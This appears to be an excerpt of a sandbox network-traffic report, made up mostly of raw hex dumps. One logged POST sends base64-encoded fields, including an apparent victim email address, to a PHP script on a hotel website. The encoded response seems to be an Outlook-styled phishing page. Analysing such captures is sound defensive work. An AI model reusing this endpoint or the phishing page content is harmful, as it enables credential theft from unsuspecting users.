                                              Data Ascii: ]]Y MG-WM_KVgGg>W&i&5XnF>gla0x){8}>;|9i 7?kNW APEjpYrJp7~V8o? 3#JF;Sl6QAiCfT0YwI+~[kB41L[*
                                              2023-09-05 23:45:27 UTC522INData Raw: ad 4b 7e b6 db b7 52 a9 36 09 dc 59 c3 63 6a fc d3 3c 84 97 4c 5d e8 17 83 25 a1 d2 11 d2 54 53 cb b6 52 e7 4f 8d 9e 57 c3 b6 62 63 bb c2 a3 c7 65 d0 50 84 7d 8e 53 0c 02 16 bd ae bc 10 5c 16 f5 dc 0a 1e de e1 fb 54 84 1f dd f6 d1 75 e1 a4 20 68 c1 8c b9 d0 ab 6b a6 bb 2e 78 08 06 fb 7f 7b 07 c8 e8 08 df 13 7a 5a 09 4a 0e 54 6f 8c 3b c7 38 e6 cd 48 cb 10 af 89 0e 80 cb 50 1f 5e 45 73 54 0a 12 27 4b 9c 40 c1 e4 06 ee cf 04 f7 0c 0a 84 74 f6 81 42 f3 25 46 6a e4 64 43 d3 7f 83 d7 d7 aa 06 16 0d 6f b1 1d a3 ae 86 40 58 56 2b ae 17 e3 ea b0 7a 2e 05 93 07 54 ad 14 04 f3 22 21 22 a6 c6 1b 8d d4 c3 42 c3 9e b2 e0 02 ba cc 46 f3 8b 2e 7e 8b 5f 87 1c 99 61 63 a8 61 0b 1b 3b a1 d8 00 0d 10 f4 3b 25 23 09 4f 36 90 4c 9b f7 3d 42 0d 1e 64 58 98 99 e1 6f da c0 0a 08
                                              Data Ascii: K~R6Ycj<L]%TSROWbceP}S\Tu hk.x{zZJTo;8HP^EsT'K@tB%FjdCo@XV+z.T"!"BF.~_aca;;%#O6L=BdXo
                                              2023-09-05 23:45:27 UTC523INData Raw: 41 3a 2c 41 2d 15 ac bf c6 77 e6 85 79 ca b0 90 d2 89 cb f1 56 e0 6a 56 55 0c 9c 5e be 98 81 7d b0 7c 77 7f 54 48 c1 d3 98 2c 1f 03 41 71 c8 30 3b 2c f3 5a 44 2a ae dc 23 7b 9f bc ad 6c cc 48 37 e0 d5 62 1e 52 58 ef 30 43 81 c7 64 cd 75 42 d1 a2 f5 35 d2 64 a8 3d cd 56 b0 5c 54 3d 9b 51 33 00 13 8b 37 6f 0b ed 71 13 41 cc 90 41 fb 8c eb 4f fc fc 06 6c ee dc bf a2 9f e7 21 fb ad 7b 5f 75 44 0c 47 5f 93 ad ce 72 6b f6 af df 98 54 94 5e 98 90 a2 7d 57 d0 6f 29 18 2e 38 1a 98 98 ac a5 7c 67 57 0f 50 95 43 65 ee 4a 9f bd f6 9c 78 ee 36 4e b2 d3 fe ff 07 df 1f 28 c3 7e 76 07 fc 5f 99 3b a2 ce 9e 0e aa fe e0 53 3f 08 8b 99 8b 57 23 18 4d fc cb bf df d7 5e 8a db 7f 53 e9 c8 16 a1 cf 6d 47 ff 0d 1b ce b8 4a 7f 9f ed 51 35 30 07 06 20 e5 99 69 ba 3c a5 26 2b ae c8
                                              Data Ascii: A:,A-wyVjVU^}|wTH,Aq0;,ZD*#{lH7bRX0CduB5d=V\T=Q37oqAAOl!{_uDG_rkT^}Wo).8|gWPCeJx6N(~v_;S?W#M^SmGJQ50 i<&+
                                              2023-09-05 23:45:27 UTC525INData Raw: 07 ca 72 03 65 3d 1d 9d 3f c0 dc fb db 28 b6 fd fd 03 81 8a 13 77 87 94 1b 2f 2f 94 28 c7 02 5f 60 bd 35 fa 77 ce 2f 9e 2f 2b 3a 58 7d b7 5a fc 58 d6 c2 2e 72 75 c8 90 51 96 80 97 81 57 26 ed 03 dc 65 55 73 3f 7f 81 7a f0 7f 4e 83 d2 7c 6a 6a 04 1a 5f c8 4d 77 33 31 87 e4 c7 11 1f 0f 23 71 16 4a 5b 75 ff 57 46 f0 78 f9 d4 8e b0 7d 08 07 da 79 7d 4d 85 72 bd 2e 29 72 e8 be 31 2b 89 1b b5 17 29 09 f3 a5 51 6e b5 22 7c 44 1f c2 55 17 29 5e 38 73 36 dc fe ed 0c fd 63 ab c4 23 fb 92 0f a8 41 ec 3b 7d 97 2f 0b df 0a a3 c2 09 cf 1b b9 d2 3f ef 1b d6 4b 7f e4 f0 80 ce b8 c4 bb ec 47 9f 9f fa 4d 67 dd 69 bd a0 0f 39 5e 23 30 f3 cf 3b d8 8e 97 12 4a 62 18 8b 8f ea 98 99 d8 da f6 23 b2 3c 9f e8 eb 4d eb 7a 7d 1e 74 75 6d fe b8 6b fb 8e 70 87 96 61 53 16 ac 98 ae 9e
                                              Data Ascii: re=?(w//(_`5w//+:X}ZX.ruQW&eUs?zN|jj_Mw31#qJ[uWFx}y}Mr.)r1+)Qn"|DU)^8s6c#A;}/?KGMgi9^#0;Jb#<Mz}tumkpaS
                                              2023-09-05 23:45:27 UTC526INData Raw: 55 17 ca 03 2c f0 b7 9f fe 30 33 09 8f a0 ab ec ab f4 da e7 cc b5 31 0b c1 d0 51 99 26 c8 1e a2 9c 67 3b 21 8f d0 5d 76 9a 58 e6 eb 7e 30 9c 61 f6 b9 0b b9 9b c1 d5 09 8f f8 5c bd 4d 81 b8 fc a1 86 46 34 43 26 68 e2 99 20 8d 56 d4 d3 be d3 97 7c 8e ac ae e6 80 99 77 39 ea a3 7d c1 9c 39 8d 2f b5 ed 48 86 14 59 bc b4 a5 9a 31 ea e6 95 cb 9a b5 57 05 85 28 d4 75 32 69 67 16 6f d4 7d 39 a8 7e 21 56 37 1b d6 3b 9d 3a 48 a9 09 f3 78 c7 97 d7 13 7e 08 e3 b2 bf a7 8a 0f 76 05 57 dc d8 b2 fb 6a a1 cb 0d fb 77 8f 24 19 e2 c4 6b ca aa 65 9a be 88 31 5a 5e 9d 57 24 53 d7 2b c4 bc d1 9a 2c a9 2d ab 33 ad d6 07 21 ec 63 6d ee 99 68 16 fc ba 39 95 8e 9b a1 25 06 20 51 2a 3b 25 81 5f 96 0f ee 00 a8 38 88 46 56 28 b3 d5 f8 86 9b 73 f8 df b7 66 cc 38 14 64 f5 9b 9d 17 9f
                                              Data Ascii: U,031Q&g;!]vX~0a\MF4C&h V|w9}9/HY1W(u2igo}9~!V7;:Hx~vWjw$ke1Z^W$S+,-3!cmh9% Q*;%_8FV(sf8d
                                              2023-09-05 23:45:27 UTC527INData Raw: e3 44 21 ea 24 01 53 ab 78 38 90 a0 3b ad 8a c4 cf 3b c5 28 ba 93 00 a5 7e 1b 0d aa 57 6f 75 ba 5c 18 cb 1d 07 48 74 da 2a 47 c4 9e 0e 76 ca 3a aa d3 5b e3 be 4c d7 72 98 de 2d a0 ab a9 79 fc 47 d0 6d 0a 6b 83 2d 36 4b 17 bf 3d 82 39 01 d8 44 3e b9 47 6b f6 be e2 0e 9b 61 44 18 ee 6c 39 e0 3c 6a dd 1b 55 98 14 72 af 9d 00 37 0b 8c ac e0 f4 6a b4 b9 2a ed 06 4e 6c a5 bb c0 14 8f 93 17 29 38 c1 11 6a 90 32 94 d0 62 e2 e9 53 cb c0 1e 2d 61 8a 9b 73 f3 ef e8 34 64 20 2c 19 a6 01 60 04 82 38 06 01 1b 1e 6a 30 5f 46 43 2a b8 12 36 a5 14 a7 89 2a bf 5b 24 5f 5c 20 71 27 3b 18 43 32 6c 44 d6 49 d2 f9 13 3d 23 e2 17 f1 3a de 56 70 2d 28 5f 9b e9 48 61 cc b9 24 a4 24 3d 77 bf 23 16 6d 06 43 2a 41 e1 31 4a 8b 19 d5 50 b9 25 9a 73 e0 64 2a a7 3a d4 e1 25 09 7d e8 ba
                                              Data Ascii: D!$Sx8;;(~Wou\Ht*Gv:[Lr-yGmk-6K=9D>GkaDl9<jUr7j*Nl)8j2bS-as4d ,`8j0_FC*6*[$_\ q';C2lDI=#:Vp-(_Ha$$=w#mC*A1JP%sd*:%}
                                              2023-09-05 23:45:27 UTC529INData Raw: 72 38 f4 8e a6 13 ee 65 31 1b 8a ba cf fa ee 6a ae c9 42 f3 cd e3 fd f3 0d ff d5 55 95 98 bf 71 38 a5 60 7b 1f 6c 5f 64 3c 43 c9 68 1d 6a ac 68 b0 bb 7c d1 76 fb 6f 1d e3 d0 4c 39 a6 a1 c0 df fb 17 67 8a 06 ad f1 e4 87 84 a8 62 c8 25 bc 26 b7 b2 68 c8 20 de 78 c0 d6 4c a0 ad 29 7b 0b 17 28 66 6f f6 9b 7f ec 50 9b 48 19 96 eb 9e c7 7e 6c 17 96 93 1d f1 d8 38 a2 20 2d 73 ea b4 33 bb 28 21 cd df dd 43 6b 19 62 ab 85 c3 65 72 91 0a 41 c7 45 d2 48 d5 f3 d0 8a 6d c7 71 b5 d8 a0 cc ae 90 78 82 19 b6 c0 2b 39 26 56 9e 1c cb 48 4c 61 c4 02 ca 0e b2 f5 e7 e0 6a 4b 23 23 30 63 95 65 a3 c5 5b 61 62 68 cd 40 f6 2f 39 da f3 e4 f1 dc 4a 79 1c 31 9e 4d 4b fc bb 3a e4 35 62 9c 6f 4e be 4b c2 54 92 bf 68 1e 77 da e7 d8 51 1e 97 c6 17 7f 09 ba b0 29 e5 9d 81 dd 28 0a bd 69
                                              Data Ascii: r8e1jBUq8`{l_d<Chjh|voL9gb%&h xL){(foPH~l8 -s3(!CkberAEHmqx+9&VHLajK##0ce[abh@/9Jy1MK:5boNKThwQ)(i
                                              2023-09-05 23:45:27 UTC530INData Raw: b6 89 94 61 1d 8b f0 2c 04 e2 89 c8 11 a8 aa cc 75 5d 1d cf ba a9 9d 55 2c 59 f6 3b 49 ed 61 d8 cb af ac 25 16 79 cb c2 5c 09 88 1c c0 23 b9 32 22 a0 64 b9 c1 11 89 61 45 de b5 3e 50 95 7e af 3f 6e c5 a0 76 5d 77 5a c4 ef cc 59 d7 ac 02 ce ef 8e b1 b0 f0 80 b7 61 29 88 e6 de 33 9d 33 74 32 d0 f1 e3 ef 0f f7 ad 54 fe fd db b7 4d 4e ef f8 36 3d ed 9c 3f 43 dd b9 d3 de 90 81 07 64 ff 7d 31 f0 19 79 22 39 f5 67 56 e0 15 0e ca cb 9a 21 5a 31 03 b1 71 7a 26 df 57 ba b1 77 95 8d 2d 66 a3 52 9c 08 84 43 7c 4b 0f c2 3e 1d 0e c1 fe a8 27 df 63 77 00 41 3f 60 36 24 2c d8 7c 43 c3 6b d9 9d ed e4 30 e9 2d 3e 5c f7 23 a8 cb bd c8 f7 c2 d5 ef 9f f4 35 4b 1c ef b0 4c 69 d2 54 6f 6d f1 cc 5c 5b da a9 4e 4a 58 75 8e 7d ea 95 b5 07 db a1 18 92 78 fd c6 c3 5b 40 34 ab 75 ab
                                              Data Ascii: a,u]U,Y;Ia%y\#2"daE>P~?nv]wZYa)33t2TMN6=?Cd}1y"9gV!Z1qz&Ww-fRC|K>'cwA?`6$,|Ck0->\#5KLiTom\[NJXu}x[@4u
                                              2023-09-05 23:45:27 UTC531INData Raw: 82 e5 a8 eb d6 ee 7e bd 5c d7 da d8 ea 5c e3 20 ca 04 b0 05 81 07 3d 0f f6 e9 a1 77 c0 8e 16 e5 b8 99 e4 22 aa e4 69 aa 34 e0 c8 7d 42 95 a9 57 33 99 df ac ee e3 ee 5b 6f 34 59 66 b9 cc 22 8b 1d fe d2 d2 33 31 03 44 7f 6f da 94 bd c0 72 c1 5d 43 83 aa 84 70 cf bc 41 79 6c b0 a2 6b c9 37 53 20 4c ae cd 6a c1 aa 0d f5 40 d9 3e fd f9 73 fa 25 ff f1 ea 30 db 29 75 11 b5 41 ba 20 dd 39 fd 88 2d 5e 7b 1a 23 78 f8 2f a1 de a6 4c 5b 16 60 e2 30 2f ad 96 28 89 dc 3f c2 a8 59 cd 29 86 d8 9b 61 0a 8c 77 49 7b e2 ad 64 cd 64 43 08 31 af 95 b6 d9 dd f8 ed da 90 da 47 f0 8c 64 85 12 6a 89 bc 3c 96 e3 80 f1 1a f2 a4 52 af eb 30 f0 2a 65 59 43 b1 4e 73 49 28 7e 2e e4 b8 11 44 3c 81 9f 6f 75 0f 77 cf aa 2f db 9f 45 50 9b 71 02 dc f7 7b 82 0b db 63 db 89 58 24 36 02 e3 e2
                                              Data Ascii: ~\\ =w"i4}BW3[o4Yf"31Dor]CpAylk7S Lj@>s%0)uA 9-^{#x/L[`0/(?Y)awI{ddC1Gdj<R0*eYCNsI(~.D<ouw/EPq{cX$6
                                              2023-09-05 23:45:28 UTC535INData Raw: d7 7e 0c 6c 96 7a 5d 25 f2 be e0 78 81 f9 d5 a4 ae 31 9f 47 32 f5 b2 0d cd af 1e f7 34 60 0b 31 77 f9 a1 b3 b9 0f 5e f8 0e b1 22 42 f6 7e d9 ce 3c d7 8e 6b d5 68 fa 3a a5 fb bf 26 f5 39 44 83 c9 97 1f fc d9 40 09 f1 ba 81 49 b8 c8 e2 34 3c ec 6c 9c 43 22 ed 60 bf c8 36 e7 fc a5 c1 de 37 16 d0 8b 95 ec bd 80 7b ef 95 85 ed a7 3d 56 9f 2b af 95 0d 60 97 e1 54 03 f8 7f 0f 55 10 30 eb 94 8e a0 b1 73 2a 4f ca 8f 1b 12 ed bc b0 74 6a 8d e1 d4 79 e8 32 96 cf a0 8a c2 7c 2a 05 28 54 77 d8 6c a9 64 b6 c5 62 e2 6e 51 2f c8 cb 37 5a 5b 9b 69 7d 0f 9a 68 c3 ad 6d 5e 89 9b 57 a3 4c b6 6d a7 3f e4 01 2c 2f 6f 6b 6b 02 58 c5 46 74 06 bb 15 02 87 b6 13 bb b1 2b 9d 2d cf e4 7b 56 9a aa ba 58 37 8c 4e 46 64 0c f7 14 fd 17 ce 33 39 c4 c8 91 85 56 bd d1 7b 07 5c 8f 14 a8 6f
                                              Data Ascii: ~lz]%x1G24`1w^"B~<kh:&9D@I4<lC"`67{=V+`TU0s*Otjy2|*(TwldbnQ/7Z[i}hm^WLm?,/okkXFt+-{VX7NFd39V{\o
                                              2023-09-05 23:45:28 UTC540INData Raw: 0b 8d 98 e4 71 1c 30 2e 8e 57 32 76 e1 cd f7 c2 31 68 64 8d 2d 43 5a f1 a4 bf 56 d5 41 40 b5 47 84 c3 b1 7c 67 3b ee e5 3d 19 45 d6 18 34 ca 27 4b 3c fc 40 ad ba 7c 08 8b 98 34 5e 80 71 09 7c e5 5c e5 7f fb 86 56 15 1f e2 ed 1b 9f 31 70 a0 0f 25 5b c6 23 53 d4 ef e0 23 ec 46 e9 8b fa e2 f7 cf d8 23 b2 a8 2d a6 43 a4 49 f1 da cc ed cc a5 be 2b 5c 16 29 2c ed 57 79 79 f2 3a 23 ec df 73 ed f7 51 a5 bc a8 98 e5 50 5e 3c f1 f2 df 45 fe 2f eb 50 98 9e ac 94 4e 79 87 84 ba f3 88 ff df 9e 92 3f 29 81 e8 65 c0 fd 53 fd 92 7f 62 3a 09 6a 1e 77 a5 6e 61 a6 8d d2 ee 5c b8 54 c7 f7 5d 6e 3e 2c b2 e6 4a 7a a3 bb 8d 46 20 22 e7 a9 bc a2 c6 b9 30 2d bc c9 e1 68 8b 00 87 96 fa cb 71 f3 b4 b3 28 42 3f d6 e9 e6 5a 08 7b 29 b2 b1 cb 36 7b b3 6f ab 8d 9b dd 94 ee 98 da 32 57
                                              Data Ascii: q0.W2v1hd-CZVA@G|g;=E4'K<@|4^q|\V1p%[#S#F#-CI+\),Wyy:#sQP^<E/PNy?)eSb:jwna\T]n>,JzF "0-hq(B?Z{)6{o2W
                                              2023-09-05 23:45:28 UTC541INData Raw: 99 e8 84 50 a6 5b 22 71 2c 36 99 17 c6 0a 16 ba a8 dd 3c 73 1e 5a 8d 6d 4e 76 2e 0d 83 b2 81 2e 27 a0 eb ba 0d 1f d4 9c 96 11 b9 df d5 fc 7d 39 89 b5 50 cc 82 bc 24 0d fc b9 c8 68 3f fa f7 ea cb 83 1b 32 3d f7 f3 82 2b 0b 2e c5 23 47 3d 77 4f 93 99 1c 47 3e 84 23 cc 61 c8 00 e6 ea 9b 00 63 64 24 a0 5c 1e c7 d9 80 87 ee 9d f8 b5 ef dd bb fa 8a e1 67 e3 b5 79 b4 5a ba 67 8b eb 76 8c 62 9f bc f7 d4 b7 61 7a 02 38 16 a9 7b c8 9b 7d 0e 42 68 d2 41 b7 7b 6d 44 03 fe 86 ae 85 85 2e 83 1c f4 27 2a 4b b8 db 4f 1b 69 6b 3b a2 9d 44 20 96 23 99 13 81 80 9d 1c ae 2f 00 68 90 86 90 ba 3b 93 40 1a ff e0 c2 b1 0d 21 f4 db 2b ff da ab 0e cc 2d b2 16 63 9c 6b 6e 2e fa cb ef 76 19 96 24 3f 3a 8b ef 89 a6 81 ef dc 97 df c5 c0 fe 62 c7 7b df 13 cd 61 7a 03 c0 4b c0 c3 ea de
                                              Data Ascii: P["q,6<sZmNv..'}9P$h?2=+.#G=wOG>#acd$\gyZgvbaz8{}BhA{mD.'*KOik;D #/h;@!+-ckn.v$?:b{azK
                                              2023-09-05 23:45:28 UTC545INData Raw: 45 06 8b 47 13 a6 65 93 86 4c df 65 be 75 72 80 48 f2 e0 ba 0f c9 e7 02 31 8c 9d 11 b4 1b 95 1f bc 54 ff 7e ce a7 1d 74 57 79 77 b3 24 76 73 6a 18 12 ac 66 32 28 fd 64 e8 db ef 46 d7 67 5d 6b 53 7a 21 7e a0 27 5d 1e 3a 34 05 60 04 89 6c 79 69 31 9f 59 ca b8 80 c0 37 79 f3 08 ad 54 e1 a3 c4 29 12 49 4a d1 f2 9b 75 8b cd 20 96 b2 a5 be 5e c4 c2 03 d5 b3 12 83 c4 b7 98 27 5e 44 a1 1f e7 76 d2 d4 d0 d1 f7 83 d3 49 77 4e 7b 2b 24 3e c7 7c 0c f2 d4 d8 bf f3 7a ec 46 64 f9 17 de 19 9c de 61 0c ed 1e ba 91 cc e6 a2 04 4f bc df 62 44 4c 1f d1 7b cc ac f7 b5 6f c0 be 9d 3c 35 7c ff ca 90 96 80 2d 44 49 9f a0 df 9a 6b f9 ad d7 79 eb b5 42 6f 57 c5 2b f7 6f 95 cb c9 5e e8 c4 27 5e 4e 3f f1 c1 e8 20 16 3d 38 5c 7c 37 72 70 30 e2 7e 49 71 c0 0b 87 58 bc f6 8a 9a ec aa
                                              Data Ascii: EGeLeurH1T~tWyw$vsjf2(dFg]kSz!~']:4`lyi1Y7yT)IJu ^'^DvIwN{+$>|zFdaObDL{o<5|-DIkyBoW+o^'^N? =8\|7rp0~IqX
                                              2023-09-05 23:45:28 UTC549INData Raw: 31 d9 69 0f 7a e7 dd c0 83 66 d2 86 4d ac 8b 6d b3 a5 06 20 01 eb 0c f0 d1 1f 7a 60 d2 fb ac 30 1a 58 10 ff 2a b4 cb 2b 47 e3 7f a8 6e 1a d1 d1 20 3f 4a 0f 1d 0c eb 3e 03 c8 06 00 5b 53 74 81 64 b0 3e 29 17 8d 12 03 60 7a 64 4d 1f 91 b8 b4 2b c8 39 82 c1 ae 2c 5a 27 2c 20 c4 af 3e 19 10 63 75 7d 6e c0 aa 6d c4 90 d8 4e e9 90 3d 99 7a 38 01 24 11 52 02 d5 a3 cc 33 f2 63 0c b1 a8 17 31 01 4d 45 10 ac c4 4b a4 59 bd 24 b7 b6 8d 8b a3 d3 f0 86 d8 04 a1 d4 0d 35 ea 0a e4 5d 1c 59 3c 7a 88 28 b0 8d b3 bb a9 3a 1e cf 4f 62 ea 4e a8 bd 41 9b 45 8c 03 35 d8 a5 2c bb 8e 2f 9e 01 d0 0e 07 00 2d a4 b1 de 44 0c d9 ca b0 e6 01 b2 01 13 ad 73 55 84 32 0a 62 cc 43 3d 87 87 95 28 b0 46 c9 73 55 01 d7 3b cb 8f 28 2e f3 15 e4 26 89 ef 40 c3 b7 11 3f 4b 96 2a 17 01 d8 95 ca
                                              Data Ascii: 1izfMm z`0X*+Gn ?J>[Std>)`zdM+9,Z', >cu}nmN=z8$R3c1MEKY$5]Y<z(:ObNAE5,/-DsU2bC=(FsU;(.&@?K*


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.449737184.171.250.122443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:27 UTC476OUTPOST /host22/7ffe563.php HTTP/1.1
                                              Host: www.grandehotelbraganca.com.br
                                              Connection: keep-alive
                                              Content-Length: 159
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              Accept: */*
                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Origin: null
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:27 UTC476OUTData Raw: 73 63 74 65 3d 62 33 4a 79 65 57 46 75 4c 6e 4e 6a 61 48 4a 70 64 6d 56 79 51 48 5a 70 61 47 45 75 59 32 45 3d 26 64 61 74 61 31 31 3d 4e 51 3d 3d 26 64 61 74 61 32 32 3d 6b 31 4e 7a 55 79 26 64 61 74 61 33 33 3d 4d 54 59 35 4d 7a 26 63 6f 6e 66 3d 65 79 4a 69 59 57 4e 72 49 6a 6f 69 5a 47 56 6d 59 58 56 73 64 43 49 73 49 6e 52 70 64 47 78 6c 49 6a 6f 69 5a 47 56 6d 59 58 56 73 64 43 49 73 49 6d 4e 68 63 48 52 70 62 32 34 69 4f 69 4a 6b 5a 57 5a 68 64 57 78 30 49 6e 30 3d
                                              Data Ascii: scte=b3JyeWFuLnNjaHJpdmVyQHZpaGEuY2E=&data11=NQ==&data22=k1NzUy&data33=MTY5Mz&conf=eyJiYWNrIjoiZGVmYXVsdCIsInRpdGxlIjoiZGVmYXVsdCIsImNhcHRpb24iOiJkZWZhdWx0In0=
                                              2023-09-05 23:45:28 UTC553INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:28 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.20
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
                                              Set-Cookie: PHPSESSID=eee891938675b7512346ed51439d74aa; path=/
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2023-09-05 23:45:28 UTC553INData Raw: 33 64 30 37 0d 0a 50 47 68 30 62 57 77 67 5a 47 6c 79 50 53 4a 73 64 48 49 69 49 47 78 68 62 6d 63 39 49 6d 56 75 49 6a 34 4e 43 69 41 67 49 44 78 74 5a 58 52 68 49 47 4e 6f 59 58 4a 7a 5a 58 51 39 49 6e 56 30 5a 69 30 34 49 6a 34 4e 43 69 41 67 49 44 78 73 61 57 35 72 49 47 68 79 5a 57 59 39 49 6d 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 42 51 55 46 43 51 55 46 46 51 55 68 54 51 55 46 42 51 55 56 42 53 55 46 42 62 30 52 33 51 55 46 47 5a 30 46 42 51 55 4e 6e 51 55 46 42 51 57 52 42 51 55 46 42 55 55 46 42 51 55 46 42 52 55 46 4a 51 55 46 42 51 55 46 42 51 57 64 42 4e 45 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51
                                              Data Ascii: 3d07PGh0bWwgZGlyPSJsdHIiIGxhbmc9ImVuIj4NCiAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4NCiAgIDxsaW5rIGhyZWY9ImRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxBQUFCQUFFQUhTQUFBQUVBSUFBb0R3QUFGZ0FBQUNnQUFBQWRBQUFBUUFBQUFBRUFJQUFBQUFBQWdBNEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
                                              2023-09-05 23:45:28 UTC561INData Raw: 61 48 51 75 5a 57 39 30 50 79 4e 70 5a 57 5a 70 65 43 63 70 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6d 62 33 4a 74 59 58 51 6f 4a 32 56 74 59 6d 56 6b 5a 47 56 6b 4c 57 39 77 5a 57 35 30 65 58 42 6c 4a 79 6b 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 56 79 62 43 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 76 64 58 52 73 62 32 39 72 4c 54 45 75 59 32 52 75 4c 6d 39 6d 5a 6d 6c 6a 5a 53 35 75 5a 58 51 76 59 58 4e 7a 5a 58 52 7a 4c 32 31 68 61 57 77 76 5a 6d 39 75 64 48 4d 76 64 6a 45 76 5a 6d 39 75 64 48 4d 76 63 32 56 6e 62 32 56 31 61 53 31 73 61 57 64 6f 64 43 35 33 62 32 5a 6d 4a 79 6b 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41
                                              Data Ascii: aHQuZW90PyNpZWZpeCcpDQogICAgICAgICAgICAgICAgICAgICAgICBmb3JtYXQoJ2VtYmVkZGVkLW9wZW50eXBlJyksDQogICAgICAgICAgICAgICAgICAgIHVybCgnaHR0cHM6Ly9vdXRsb29rLTEuY2RuLm9mZmljZS5uZXQvYXNzZXRzL21haWwvZm9udHMvdjEvZm9udHMvc2Vnb2V1aS1saWdodC53b2ZmJykNCiAgICAgICAgICAgICA
                                              2023-09-05 23:45:28 UTC569INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:28 UTC569INData Raw: 31 66 34 30 0d 0a 70 62 57 46 30 61 57 39 75 4c 57 6c 30 5a 58 4a 68 64 47 6c 76 62 69 31 6a 62 33 56 75 64 44 6f 67 4d 54 41 77 4d 44 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 4e 73 62 32 46 6b 61 57 35 6e 54 47 39 6e 62 7a 49 35 58 33 52 7a 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 68 62 6d 6c 74 59 58 52 70 62 32 34 36 49 47 78 76 59 57 52 70 62 6d 64 4d 62 32 64 76 4d 6a 6c 66 64 48 4e 66 58 33 52 7a 49 44 4d 77 4d 44 42 74 63 79 42 73 61 57 35 6c 59 58 49 67 4d 53 42 75 62 33 4a 74 59 57 77 67 5a 6d 39 79 64 32 46 79 5a 48 4d 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 57 35 70 62 57 46 30 61 57 39 75
                                              Data Ascii: 1f40pbWF0aW9uLWl0ZXJhdGlvbi1jb3VudDogMTAwMDsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgICNsb2FkaW5nTG9nbzI5X3RzIHsNCiAgICAgICAgICAgICAgICBhbmltYXRpb246IGxvYWRpbmdMb2dvMjlfdHNfX3RzIDMwMDBtcyBsaW5lYXIgMSBub3JtYWwgZm9yd2FyZHM7DQogICAgICAgICAgICAgICAgYW5pbWF0aW9u
                                              2023-09-05 23:45:28 UTC577INData Raw: 6d 56 79 49 6c 30 36 4f 69 31 33 5a 57 4a 72 61 58 51 74 61 57 35 75 5a 58 49 74 63 33 42 70 62 69 31 69 64 58 52 30 62 32 34 73 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 62 6e 56 74 59 6d 56 79 49 6c 30 36 4f 69 31 33 5a 57 4a 72 61 58 51 74 62 33 56 30 5a 58 49 74 63 33 42 70 62 69 31 69 64 58 52 30 62 32 35 37 61 47 56 70 5a 32 68 30 4f 6d 46 31 64 47 39 39 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 63 32 56 68 63 6d 4e 6f 49 6c 31 37 4c 58 64 6c 59 6d 74 70 64 43 31 68 63 48 42 6c 59 58 4a 68 62 6d 4e 6c 4f 6e 52 6c 65 48 52 6d 61 57 56 73 5a 44 73 74 62 57 39 36 4c 57 4a 76 65 43 31 7a 61 58 70 70 62 6d 63 36 59 32 39 75 64 47 56 75 64 43 31 69 62 33 67 37 4c 58 64 6c 59 6d 74 70 64 43 31 69 62 33 67 74 63 32 6c 36 61 57 35 6e 4f 6d 4e 76
                                              Data Ascii: mVyIl06Oi13ZWJraXQtaW5uZXItc3Bpbi1idXR0b24saW5wdXRbdHlwZT0ibnVtYmVyIl06Oi13ZWJraXQtb3V0ZXItc3Bpbi1idXR0b257aGVpZ2h0OmF1dG99aW5wdXRbdHlwZT0ic2VhcmNoIl17LXdlYmtpdC1hcHBlYXJhbmNlOnRleHRmaWVsZDstbW96LWJveC1zaXppbmc6Y29udGVudC1ib3g7LXdlYmtpdC1ib3gtc2l6aW5nOmNv
                                              2023-09-05 23:45:28 UTC584INData Raw: 0d 0a
                                              Data Ascii:
